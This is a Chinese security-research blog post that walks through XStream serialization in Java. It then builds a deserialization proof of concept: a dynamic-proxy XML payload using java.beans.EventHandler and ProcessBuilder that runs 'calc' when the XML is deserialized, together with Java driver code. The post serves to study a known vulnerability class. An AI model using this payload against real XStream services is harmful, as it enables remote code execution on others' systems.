安研 - Java - XStream序列化与反序列化 - 调试分析

一、XStream的基本用法

依赖:
<dependencies>
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.10</version>
        </dependency>
</dependencies>

类:
//Person.java
public class Person {
    private String name;
   private int age;
   public Person(String name,int age)
   {
        this.name=name;
        this.age=age;
   }
  
   public String toString() {
        return "Person [name=" + name + ", age=" + age + "]";
   }

}

序列化与反序列化:
//Serializa.java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.io.xml.DomDriver;

public class Serialize {
    public static void main(String[] args) throws Exception {

        //序列化
        Person person = new Person("econ", 1);
        XStream xstream = new XStream(new DomDriver());
        String xml = xstream.toXML(person);
        System.out.println(xml);
        /**
            <Person>
                <name>econ</name>
                <age>1</age>
            </Person>
         **/
        //反序列化
        person = (Person) xstream.fromXML(xml);
        System.out.println(person);
        //Person [name=econ, age=1]
    }
}

 

二、基于动态代理漏洞的序列化与反序列化

基础:

Java反射

Java代理模式 - 静态|动态

 

基于InvocationHandler | EventHandler | Proxy 构造 Gadget

//HelloService接口
interface HelloService {
    void sayHello();
    void goodBye();
}

//委托类
public class HelloServiceImpl implements HelloService {
    public void sayHello() {
        System.out.println("hello world.");
    }
    public void goodBye() {
        System.out.println("goodBye!");
    }
}

//EventHandlerTest.java
import java.beans.EventHandler;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

public class EventHandlerTest {
    public static void main(String[] args){
          HelloService hs = new HelloServiceImpl();
          InvocationHandler ih = new EventHandler(new java.lang.ProcessBuilder("calc"),"start",null,null);
          HelloService dp = (HelloService) Proxy.newProxyInstance(hs.getClass().getClassLoader(), hs.getClass().getInterfaces(),ih);
          dp.sayHello();
          dp.goodBye();
    }


}

 

XStream 反序列化调用栈分析

1.DynamicProxyConverter.java
2.AbstractReferenceUnmarshaller.java
3.ReflectionConverter.java

 

XStream gadget构造

//ii 接口
public interface ii {
    void start();

    void run();

    void stop();
}

//poc.xml
<dynamic-proxy>
            <interface>com.huawei.XtreamTest.car</interface>
            <handler class="java.beans.EventHandler">
                <target class="java.lang.ProcessBuilder">
                    <command>
                    <string>calc</string>
                    </command>
                </target>
                <action>start</action>
            </handler>
</dynamic-proxy>

        
//poc.java
import com.thoughtworks.xstream.XStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.InputStream;

class poc {
    public void poc() throws FileNotFoundException {
        String path = this.getClass().getClassLoader().getResource("poc.xml").getPath();
        InputStream in = new FileInputStream(path);
        XStream xs = new XStream();
        car c = (car) xs.fromXML(in);
        c.run();
    }
    public static void main(String[] args) throws FileNotFoundException {
        poc poc1 = new poc();
        poc1.poc();
    }
}

 

posted @ 2020-05-06 21:25  7hang  阅读(487)  评论(0编辑  收藏  举报